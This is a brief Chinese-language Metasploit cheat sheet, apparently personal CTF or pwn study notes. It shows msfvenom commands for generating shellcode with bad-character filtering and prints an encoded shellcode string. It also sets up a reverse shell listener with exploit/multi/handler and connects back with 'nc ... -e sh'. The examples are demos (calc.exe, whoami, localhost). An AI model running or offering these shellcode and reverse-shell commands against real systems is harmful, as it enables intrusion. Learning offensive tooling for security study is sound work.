Metasploit

查詢審查過的模塊

Vulnerability & Exploit Database | Rapid7

產生shellcode

顯示payload列表

shellcode search arm -l payload 

生成shellcode

msfvenom -p windows/exec CMD=calc.exe -f python 

避免含有null字元

msfvenom -p windows/exec CMD=calc.exe -f python -b '\x00'

避免含有換行,注意windows的\r

msfvenom -p windows/x64/exec CMD=calc.exe -f python -b '\x00\x0a\x0d'

產生 linux shellcode

msfvenom -p linux/x64/exec CMD=whoami -f js_le --nopsled 32
var shellcode = unescape("%u99fd%ufc9f%u9e90%u9398%u9192%u9392%u989f%uf99b%u9b91%u9b90%uf89f%u9ef9%uf8fc%u9b9b%u98fd%u9b98%ub848%u622f%u6e69%u732f%u0068%u5099%u5f54%u6652%u2d68%u5463%u525e%u07e8%u0000%u7700%u6f68%u6d61%u0069%u5756%u5e54%u3b6a%u0f58%u4105")

多個參數

msfvenom -p linux/x64/exec CMD='echo exploit working' -f js_le -n 32 -e generic/none

也可以用 -f hex 之後得到一整串 hex 可以切成 byte,或者轉乘 base64 拿去 cyberchef 轉換

注意

如果在操作nc時,nc也可能受到\x00\x0a\x0d的影響。

建立反向shell

透過msf的內建session監聽,-q僅用來不打印初始圖像

msfconsole -q   

配置使用模塊

use exploit/multi/handler
set payload generic/shell_reverse_tcp

配置反向shell使用端口與地址

set lhost 0.0.0.0
set lport 1337
run

啟動nc進行連結

nc 127.0.0.1 1337 -e sh  

參見


Information Security pwn